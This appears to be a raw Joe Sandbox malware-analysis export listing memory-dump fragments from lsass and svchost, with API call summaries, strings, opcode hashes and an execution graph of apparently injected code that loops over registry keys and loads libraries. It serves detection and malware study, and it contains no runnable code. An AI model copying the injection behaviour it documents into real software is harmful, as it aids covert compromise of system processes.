                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: a48560de152222ec2e5ecfb2ae51e72d58d119491012d8f714818b9c8a77c2fb
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: B351B13625B6808AFB54CF29E485F9A3795F344F9AF509120DEA687748DBB9C843C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: b13fa7682330cfaff39fc18302c8814ee6bc0de51f7434bfdc1efbd032f6aa83
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 05F089303497C091FA108B67B9865975210B748FD3F086131DD9A87B58CF7DC4878700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: db2ee6e2e25eab6272f81190b24a3629a134ae4ae0e9ec08b982b1868799acd9
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: DFF0DA7535A68492FB549B64F8C6BE62360BB88F92F44301A9D4BC6764DF6DC48A8700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: 087bc69684e90bf5b6837604a1c19a69278a4e67605b34399d96d278f5a9468b
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 7802C73225EBC086E7A08B59F49179BB7A1F3C5B85F101115EA8E87BA8DF7CC495CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: c3c59f5f7d9bf41f64223fcc11c69de60d8d840cee10058ba634ab2fe0acab4e
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 8281E47265A6908DFB519B64E8C2BEF27A1F744F86F542212DE0AD3791DB3AC447C310
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: fd85ee6bccb19a378b8e7da3b4c85f470e712a47499b5d8169853432bb05cc3b
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: A361C93655EA84C6F7609B19F495B9BB7A0F388B45F102215FE8D83BA8CB7CC446CB04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 06506e8f26d9db207afb2df5f609808bcc957d9693a4b915801af85efdefcfec
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 2E11A332ADEA8045F6A41175E4D3BEB94407B96F7AF5C2624AE76C6BD68B1CCC43C300
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 98853bc0d20a4e5a8eba01ab371dc6f72503334149b29544cde263489e32e96c
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: B111A036ADEAC003F6A81168F4D7BEB1040FB64B76F492624AE76D63D78B1ACC534300
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: a92f69a6ed7a39524b1d71671181da407fb4c383502b3014595b4fe9b9fc2c6d
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 1A11823974AB8083FB149B15F445B9AA670F785F81F042025DE8987794EF7EC946C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 32951831cf89cd42a16c3dd9a06331f200084fa1cf99098a3fb41fda63e6641e
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 7151B23265B6C68AFB14CF15D489F9A3795F341F9BF55A924DE0683788EF38C8428704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: ab45e42f5d8abc5ed23a1275e835ea749bd5e9ab4f100a15ecdfa6445ff9d59b
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: F831AD7225A6C286FB14DF11E8C5F9A77A4F740F8AF15A514AE4A87794CF3CC942C704
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: e3b1004b57a62b041e0ac451d3bb9306ae0ba7cb75eb681e7ecd8a8dd3def641
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: 96118F32519BC492F754AF66F48569BB360F389F85F045015EF8A43754DF39C1828700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 623ab5c0233e9eea1bab3c8fe46416b911fe79bfa5c751f4448e654effed0453
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 3C51D83224E7C182F674AF6DE5D6BEB6651F385F81F042125DD8A83BA9CB35C4078B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 015bd3a9c914ebf58dd732adfdd10b8c5ff253d4599a542cd249b895547cbef8
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 6041A27221AB8086EB209F65F4857DAA7A1F788B85F405025EE8DC7798DB3DC542CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 0572907a0b52b6aa765b88d5463161c31580de8921f5093de93e672b10dc9954
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 4711173660CBC08AE760DB16F881A9AB7A4F7C9BD4F545126EE8D83B59DF38C455CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: ec83b11fee553f795087f99ec0b32c95111e6847f7d2c86749e096d5f58fa851
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 31114C32209B8082EB618F19F48069A77A0F788F99F185224DFCD4BB68DF7DC552CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: e936455b235f0237aadf95611627cab184adf6563daa5c8d617e337afa4ee394
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 74F0BE3135EBC092F604AB55B482AD72220BB88F86F486022AD4943B14CF3AC99AC740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: e41ea392005065ed7d961d6c730a9bec1ae94c1c71c12dd36f29fff9eb11d53e
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 09E0303128A5C291FA059B55A4C2ADA6221BB44B41F5970229D55463A2CF3CC8C78300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 3bed4fc48169cb569d76dfcff085be64282ee2e9da9166107fcae072f8334c38
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 4CE0657124E6C091FA045B64F882ED62222BB88F86F596022DD0987355CF39C89FC700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 77b58182167d8afeb2b4873da874a6685340b5d9bcc53e2c82b234f5095ec4d5
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 9C217C3264ABD082FB519F6AF44169BF3A0FB88F95F155110EE8C87B24EB78C5838700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: a97724dfd2cab1611f15b16932976088bd516ce71ca8d6d6fdd77eb4d602ef38
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: F1E06D7165264086F704AF62E84578A36E1FB88F02F48D024CD0987350EFBEC5DAC740

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:68
                                                Total number of Limit Nodes:2
                                                execution_graph 13969 26e02792908 13971 26e02792936 13969->13971 13970 26e02792a2b LoadLibraryA 13970->13971 13971->13970 13972 26e02792aa7 13971->13972 13973 26e027c1c28 13978 26e027c1650 GetProcessHeap HeapAlloc 13973->13978 13975 26e027c1c3e Sleep SleepEx 13976 26e027c1c37 13975->13976 13976->13975 13977 26e027c15c0 StrCmpIW StrCmpW 13976->13977 13977->13976 14022 26e027c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13978->14022 13980 26e027c1678 14023 26e027c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13980->14023 13982 26e027c1689 14024 26e027c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13982->14024 13984 26e027c1692 14025 26e027c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13984->14025 13986 26e027c169b 13987 26e027c16b6 RegOpenKeyExW 13986->13987 13988 26e027c16e8 RegOpenKeyExW 13987->13988 13989 26e027c18ce 13987->13989 13990 26e027c1727 RegOpenKeyExW 13988->13990 13991 26e027c1711 13988->13991 13989->13976 13993 26e027c174b 13990->13993 13994 26e027c1762 RegOpenKeyExW 13990->13994 14026 26e027c12c8 RegQueryInfoKeyW 13991->14026 14036 26e027c104c RegQueryInfoKeyW 13993->14036 13995 26e027c179d RegOpenKeyExW 13994->13995 13996 26e027c1786 13994->13996 14001 26e027c17d8 RegOpenKeyExW 13995->14001 14002 26e027c17c1 13995->14002 14000 26e027c12c8 16 API calls 13996->14000 14003 26e027c1793 RegCloseKey 14000->14003 14005 26e027c17fc 14001->14005 14006 26e027c1813 RegOpenKeyExW 14001->14006 14004 26e027c12c8 16 API calls 14002->14004 14003->13995 14007 26e027c17ce RegCloseKey 14004->14007 14008 26e027c12c8 16 API calls 14005->14008 14009 26e027c1837 14006->14009 14010 26e027c184e RegOpenKeyExW 14006->14010 14007->14001 14013 26e027c1809 RegCloseKey 14008->14013 14014 26e027c104c 6 API calls 14009->14014 14011 26e027c1889 RegOpenKeyExW 14010->14011 14012 26e027c1872 14010->14012 14017 26e027c18ad 14011->14017 14018 26e027c18c4 RegCloseKey 14011->14018 14016 26e027c104c 6 API calls 14012->14016 14013->14006 14015 26e027c1844 RegCloseKey 14014->14015 14015->14010 14019 26e027c187f RegCloseKey 14016->14019 14020 26e027c104c 6 API calls 14017->14020 14018->13989 14019->14011 14021 26e027c18ba RegCloseKey 14020->14021 14021->14018 14022->13980 14023->13982 14024->13984 14025->13986 14027 26e027c1499 RegCloseKey 14026->14027 14028 26e027c1334 GetProcessHeap HeapAlloc 14026->14028 14027->13990 14029 26e027c135d RegEnumValueW 14028->14029 14030 26e027c1485 GetProcessHeap HeapFree 14028->14030 14032 26e027c13af 14029->14032 14030->14027 14032->14029 14032->14030 14033 26e027c13dd GetProcessHeap HeapAlloc 14032->14033 14034 26e027c142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14032->14034 14035 26e027c1413 GetProcessHeap HeapFree 14032->14035 14042 26e027c1554 14032->14042 14033->14032 14034->14032 14035->14034 14037 26e027c11b5 RegCloseKey 14036->14037 14040 26e027c10b9 14036->14040 14037->13994 14038 26e027c10c7 RegEnumValueW 14038->14040 14039 26e027c1149 GetProcessHeap HeapAlloc 14039->14040 14040->14037 14040->14038 14040->14039 14041 26e027c117f GetProcessHeap HeapFree 14040->14041 14041->14040 14043 26e027c15a4 14042->14043 14044 26e027c156e 14042->14044 14043->14032 14044->14043 14045 26e027c158d StrCmpW 14044->14045 14046 26e027c1585 StrCmpIW 14044->14046 14045->14044 14046->14044

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: c2f8ea4661837c6de5e48aaa53c5ce441db971c221d9d48b770f4cd3854a0070
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: CD11C4786106014BFF229730F8CE37522E0B748705F6E816C994AA51D4EFFFC1448600

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0000026E027C1650: GetProcessHeap.KERNEL32 ref: 0000026E027C165B
                                                  • Part of subcall function 0000026E027C1650: HeapAlloc.KERNEL32 ref: 0000026E027C166A
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C16DA
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1707
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1721
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1741
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C175C
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C177C
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1797
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C17B7
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C17D2
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C17F2
                                                • Sleep.KERNEL32 ref: 0000026E027C1C43
                                                • SleepEx.KERNELBASE ref: 0000026E027C1C49
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C180D
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C182D
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1848
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1868
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1883
                                                  • Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C18A3
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C18BE
                                                  • Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C18C8
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 5c73b9ac12fb820ad7dcc6394d5cd69c523895347f81a8289b2402209744e123
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 8E31F03D301A019AFE509F37E5D937A13E4AB44BD0FAE4039DE4DA76D7DE96C4508250

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 57 26e027c3930-26e027c393b 58 26e027c393d-26e027c3950 StrCmpNIW 57->58 59 26e027c3955-26e027c395c 57->59 58->59 60 26e027c3952 58->60 60->59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: 72c475c57b13db6b953ca7df810b580f0bba01eafd113f63ce8091b0cefd85a7
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: C0D05E3871164A8FEF189FE288C967023A0AB04708F4D81658E4112194D79A998D8A10

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 0b81e5929da853fd44c803ce6b2a9aa3d9b25448aaa336044af01679fb6d3b5d
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: F761103A7017509BEE68EF25D488778B3D1FB04BA4F1A8025DE19177C6EB7AE852C704

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
